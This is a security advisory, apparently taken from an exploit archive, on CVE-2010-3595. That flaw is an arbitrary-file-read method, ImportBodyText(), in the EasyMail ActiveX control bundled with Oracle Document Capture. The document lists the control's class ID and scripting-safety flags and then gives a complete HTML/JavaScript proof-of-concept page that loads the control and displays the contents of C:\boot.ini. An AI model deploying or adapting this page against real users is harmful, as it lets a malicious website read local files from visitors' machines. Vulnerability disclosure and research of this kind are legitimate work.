Exploit for windows platform in category remote exploits
Application: Oracle Document Capture
Versions Affected: 10.1350.0005
Vendor URL: http://www.oracle.com/technology/software/products/content-management/index_dc.html
Bugs: Insecure READ method
Exploits: YES
Reported: 29.01.2010
Second report: 02.02.2010
Date of Public Advisory: 24.01.2010
CVE: CVE-2010-3595
Authors: Alexey Sintsov
by Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com)
Description
***********
EasyMail ActiveX Control (emsmtp.dll) that included into Oracle Document Capture distrib
can be used to read any file in target system. Vulnerable method is "ImportBodyText()".
Details
*******
For example if you enter filename "C:\\boot.ini" in "ImportBodyText" method then control will
open and read file "C:\boot.ini". Content of boot.ini will be loaded into property "BodyText" .
Class EasyMailSMTPObj
GUID: {68AC0D5F-0424-11D5-822F-00C04F6BA8D9}
Number of Interfaces: 1
Default Interface: IEasyMailSMTPObj
RegKey Safe for Script: True
RegKey Safe for Init: True
KillBitSet: False
Example:
*******
<HTML>
<HEAD>
<TITLE>DSECRG</TITLE>
</HEAD>
<BODY>
<OBJECT id='ora' classid='clsid:68AC0D5F-0424-11D5-822F-00C04F6BA8D9'></OBJECT>
<SCRIPT>
function Exploit(){
ora.ImportBodyText("C:\\boot.ini");
document.write("Try to read c:\\boot.ini:<br><br>"+ora.BodyText);
}
Exploit();
</SCRIPT>
</BODY>
</HTML>
References
**********
http://dsecrg.com/pages/vul/show.php?id=307
http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html
# 0day.today [2018-03-19] #